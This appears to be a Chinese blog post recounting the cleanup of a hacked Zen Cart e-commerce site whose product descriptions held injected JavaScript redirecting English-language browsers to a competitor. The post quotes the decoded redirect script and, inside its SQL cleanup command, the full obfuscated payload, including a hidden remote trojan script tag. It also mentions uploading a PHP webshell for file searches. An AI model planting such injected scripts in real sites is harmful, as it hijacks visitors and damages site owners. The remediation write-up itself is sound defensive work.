记录一次网站被黑抓马记

前言：昨天接到一个朋友的委托，任务是解决网站遇到英文浏览器自动跳转到另一个网站的问题。
背景：现在的网络时代，黑客与商业并存的时代。有些人 利用入侵技术来达到利益问题，成为网络中的黑色产业链。有人利用入侵挂马，抓肉鸡。有人利用入侵挂链，做SEO优化。呵呵，五花八门啊。今天碰到的这个问 题和SEO优化有关，是利用别人的网站浏览用户传送到指定网站。委托人的网站是外贸英文站，主要对老外出售一些商品。而跳转的网站正是同行。呵呵！有些明 白了吧，这就是SEO手段的一种。

事件回放结束，开始入题。
从现象上分析“遇到英文浏览器自动跳转”，很显示是网站代码的问题，排队了域名劫持的可能性。网站采用的是Zen Cart程序，首先声明下哥对这个东西并不熟悉哦！但解析思路是有的，首页看下网站首页有没有可疑的JS代码。很为判断浏览器的代码都是以JS代码来实现的。

打 开网站首页从浏览器，查看-源文件。先搜索下跳转到的URL地址的关键字，7louisvuitton.com未发现结果。接下来只能一行行看代码了，严 格注意js的代码。从头到尾看了半天仍然未发现可疑的代码。这个看似有些难度了。接着进入后台，利用Zen Cart源码搜索功能搜索下关键字。执行过，文件都查一遍仍然没找到。

这时接过FTP用户密码信息，操刀上了php webshell。利用文件查找功能对网站文件进行全面的关键字搜索，反复查找都没有结果。看来这东西要么是存在数据库中，要么就是换了url地址了。百 度下zen cart模板使用，关键的几个部分都手动查找下，仍然没发现结果。

这时又去网站页面的商品页仔细打量了一番,在注释这里<!–bof Product description –>发现了一段进行编码过的js。

感觉有些问题，马上拿出url解码器来看。

这个是流量统计

引用 <script language=”JavaScript”>
<!–
var la=navigator.browserLanguage.toLowerCase();
if(la==’en-us’) document.location = ‘http://ii3v.com/b’;
// –>
</script>

这个就是关键了，判断浏览器版本是en-us 就跳。。。哈哈，很犀利啊。
这里跳转的URL和关键字的那个是同一个网站。
下面发现了代码就好说了，商品应该是模板的问题吧。马上找到模板。
templates\template_default\templates\tpl_document_product_info_display.php

内 容就一个变量<?php echo stripslashes($products_description); ?>，郁闷了。没玩过Zen Cart。不知道这个变量从哪来的了。找了半天没头绪了，只好去数据库看下了。利用php webshell 备份功能连接进了数据库，看到库里正好有一个products_description的表，马上备份下载之。
本地mysql还原之
相关命令

引用 mysql -uroot -p123456
create database aaa;
use aaa;
source d:\1.sql;

恢复后
果然发现在商品描述的表前面都被插入了这段代码。

利用批理替换，马上恢复了正常。

代码如下：

引用 update products_description set products_description =replace (products_description,’<div style=”display:none”><script language=”javascript” src=” http://木马地址” charset=”gb2312″></script><script><!–
document.write(unescape(“<script%20language%3D%22JavaScript%22>%20%0D%0A<%21–%20%0D%0Avar%20la%3Dnavigator.browserLanguage.toLowerCase%28%29%3B%0D%0Aif%28la%3D%3D%27en-us%27%29%20document.location%20%3D%20%27http%3A//%69%69%33%76%2E%63%6F%6D/b%27%3B%0D%0A//%20–>%20%0D%0A</script>”));//–></script></div>’,”)

下面的任务就是查找php木马与后门，升级Zen Cart至最新了。
至此任务完成，这可算是比较犀利的SEO攻击法啊。